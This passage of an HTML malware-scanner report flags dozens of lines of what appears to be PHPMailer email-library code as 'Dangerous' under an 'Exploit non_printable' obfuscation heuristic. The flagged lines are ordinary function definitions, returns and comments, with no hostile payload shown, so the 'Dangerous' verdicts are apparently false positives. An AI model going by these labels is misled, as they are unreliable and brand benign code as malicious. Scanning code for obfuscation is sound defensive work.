</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1322</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function(</span><span style="color: #0000BB">$address</span><span style="color: #007700">) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1323</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strpos</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #DD0000">'@'</span><span style="color: #007700">) !== </span><span style="color: #0000BB">false</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1330</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">validateAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">$patternselect </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1336</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">call_user_func</span><span style="color: #007700">(</span><span style="color: #0000BB">$patternselect</span><span style="color: #007700">, </span><span style="color: #0000BB">$address</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1352</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'extension_loaded'</span><span style="color: #007700">) and </span><span style="color: #0000BB">extension_loaded</span><span style="color: #007700">(</span><span style="color: #DD0000">'pcre'</span><span style="color: #007700">)) {</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1372</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1412</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (</span><span style="color: #0000BB">strlen</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">) >= </span><span style="color: #0000BB">3</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1417</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">filter_var</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">FILTER_VALIDATE_EMAIL</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1424</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">bool </span><span style="color: #DD0000">"true" </span><span style="color: #007700">if </span><span style="color: #0000BB">required functions </span><span style="color: #007700">for </span><span style="color: #0000BB">IDN support are present</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1426</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">idnSupported</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1428</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function for </span><span style="color: #0000BB">PHP </span><span style="color: #007700"><= </span><span style="color: #0000BB">5.2</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1429</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'idn_to_ascii'</span><span style="color: #007700">) and </span><span style="color: #0000BB">function_exists</span><span style="color: #007700">(</span><span style="color: #DD0000">'mb_convert_encoding'</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1435</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">silently returns unmodified address </span><span style="color: #007700">if:</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1437</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions are not available</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1441</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">string The encoded address in ASCII form</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1443</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">punyencodeAddress</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1445</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions</span><span style="color: #007700">, </span><span style="color: #0000BB">CharSet</span><span style="color: #007700">, and </span><span style="color: #0000BB">at</span><span style="color: #007700">-</span><span style="color: #0000BB">sign</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1456</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">substr</span><span style="color: #007700">(</span><span style="color: #0000BB">$address</span><span style="color: #007700">, </span><span style="color: #0000BB">0</span><span style="color: #007700">, </span><span style="color: #0000BB">$pos</span><span style="color: #007700">) . </span><span style="color: #0000BB">$punycode</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1460</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$address</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1467</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">boolean false on error </span><span style="color: #007700">- </span><span style="color: #0000BB">See the ErrorInfo property </span><span style="color: #007700">for </span><span style="color: #0000BB">details of the error</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1469</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">send</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1475</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">postSend</span><span style="color: #007700">();</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1491</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">preSend</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1591</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">postSend</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1598</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">sendmailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1600</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">smtpSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1602</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">mailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1606</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">$sendMethod</span><span style="color: #007700">(</span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEHeader</span><span style="color: #007700">, </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">MIMEBody</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1630</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">sendmailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1704</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isShellSafe</span><span style="color: #007700">(</span><span style="color: #0000BB">$string</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1731</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">functions that access local file paths</span><span style="color: #007700">,</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1736</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">isPermittedPath</span><span style="color: #007700">(</span><span style="color: #0000BB">$path</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1738</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return !</span><span style="color: #0000BB">preg_match</span><span style="color: #007700">(</span><span style="color: #DD0000">'#^[a-z]+://#i'</span><span style="color: #007700">, </span><span style="color: #0000BB">$path</span><span style="color: #007700">);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1750</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">mailSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1759</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return-</span><span style="color: #0000BB">path header by the receiver</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1791</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">to load your own SMTP implementation</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1792</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">SMTP</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1794</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getSMTPInstance</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1799</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">smtp</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1804</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">there is a bad MAIL FROM</span><span style="color: #007700">, </span><span style="color: #0000BB">RCPT</span><span style="color: #007700">, or </span><span style="color: #0000BB">DATA input</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1814</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpSend</span><span style="color: #007700">(</span><span style="color: #0000BB">$header</span><span style="color: #007700">, </span><span style="color: #0000BB">$body</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1870</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">the operation failed</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1877</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpConnect</span><span style="color: #007700">(</span><span style="color: #0000BB">$options </span><span style="color: #007700">= </span><span style="color: #0000BB">null</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 1999</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">smtpClose</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2011</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB">Returns false </span><span style="color: #007700">if </span><span style="color: #0000BB">it cannot load the language file</span><span style="color: #007700">.</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2018</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">setLanguage</span><span style="color: #007700">(</span><span style="color: #0000BB">$langcode </span><span style="color: #007700">= </span><span style="color: #DD0000">'en'</span><span style="color: #007700">, </span><span style="color: #0000BB">$lang_path </span><span style="color: #007700">= </span><span style="color: #DD0000">''</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2045</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function.</span><span style="color: #DD0000">',</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2078</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return (boolean)</span><span style="color: #0000BB">$foundlang</span><span style="color: #007700">; </span><span style="color: #FF8000">// Returns false if language not found</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2085</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">getTranslations</span><span style="color: #007700">()</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2087</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">language</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2100</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addrAppend</span><span style="color: #007700">(</span><span style="color: #0000BB">$type</span><span style="color: #007700">, </span><span style="color: #0000BB">$addr</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2106</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$type </span><span style="color: #007700">. </span><span style="color: #DD0000">': ' </span><span style="color: #007700">. </span><span style="color: #0000BB">implode</span><span style="color: #007700">(</span><span style="color: #DD0000">', '</span><span style="color: #007700">, </span><span style="color: #0000BB">$addresses</span><span style="color: #007700">) . </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">LE</span><span style="color: #007700">;</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2116</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">function </span><span style="color: #0000BB">addrFormat</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">)</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2119</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
<span style="color: #0000BB"></span><span style="color: #007700">return </span><span style="color: #0000BB">$this</span><span style="color: #007700">-></span><span style="color: #0000BB">secureHeader</span><span style="color: #007700">(</span><span style="color: #0000BB">$addr</span><span style="color: #007700">[</span><span style="color: #0000BB">0</span><span style="color: #007700">]);</span>
</span>
</code></code></td></tr><tr><td><p><b>Exploit non_printable <span class="badge badge-pill badge-secondary py-1 px-2 ml-1 shadow-none">Line: 2121</span> <span class="badge badge-pill badge-danger py-1 px-2 ml-1 shadow-none">Dangerous</span></b></p><p>Non printable technique is usually used for the obfuscation of malicious code</p></td><td><code><code><span style="color: #000000">
